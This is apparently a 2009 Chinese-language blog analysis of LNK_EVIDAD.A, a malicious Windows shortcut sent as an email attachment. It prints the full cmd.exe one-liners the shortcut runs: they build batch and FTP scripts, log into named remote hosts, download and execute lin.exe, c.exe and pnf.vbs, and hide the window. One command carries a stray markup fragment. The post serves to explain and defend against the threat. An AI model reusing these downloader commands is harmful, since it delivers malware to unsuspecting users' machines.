Saturday, March 14, 2009

LNK_EVIDAD.A

近來在電子郵件中頗為流行的 Windows捷徑惡意下載程式 (Windows Shortcut Script Downloader),跟 .scr、.cmd 惡意程式類似,常見以 .lnk 格式夾帶於郵件附件檔中,欺騙使用者下載後點選執行。

使用者執行後,LNK 惡意程式會以 ftp 連結至惡意程式下載站下載並執行多個程式來完成整個惡意程式植入流程,常見會下載 *.vbs、*.bat、*.exe 等程式。下載指令範例如下:

%windir%system32cmd.exe /c echo ftp -s:x.r > wsx.bat&echo lin.exe >> wsx.bat&echo del</STATE /></PLACE /> x.r >> wsx.bat&echo open 202.153.172.34 > x.r&echo yak01>>x.r&echo as1213>>x.r&echo recv lin.exe >> x.r&echo bye >> x.r&wsx.bat&

 

LNK_EVIDAD.A

%windir%\system32\cmd.exe /c

echo set bf=f > hw.bat
echo %bf%ftp -s:qat.d >> hw.bat
echo c.exe >> hw.bat
echo del qat.d >> hw.bat
echo open www.as08.com > qat.d
echo as08 >> qat.d
echo recv c.exe >> qat.d
echo bye >> qat.d
hw.bat

system32\shimgvw.dll
www.as08.com 202.153.172.34

%windir%\system32\cmd.exe /c

echo o web.g03z.com> l
echo aa33 >> l
echo bb33 >> l
echo set s=echo ge> s.bat
echo set f=t >>s .bat
echo %s%t pnf pnf.vbs^>^>l>>s.bat
echo bye ^>^>l>>s.bat
echo f%f%p -s:l>>s.bat
call s.bat
start pnf.vbs
del l s.bat

web.g03z.com 202.153.172.67

執行後會最小化視窗,並使用小字型:大部份的 LNK 惡意程式都會在執行後最小化執行視窗,同時將視窗內文字設為小字型來逃避使用者的注意。(圖六)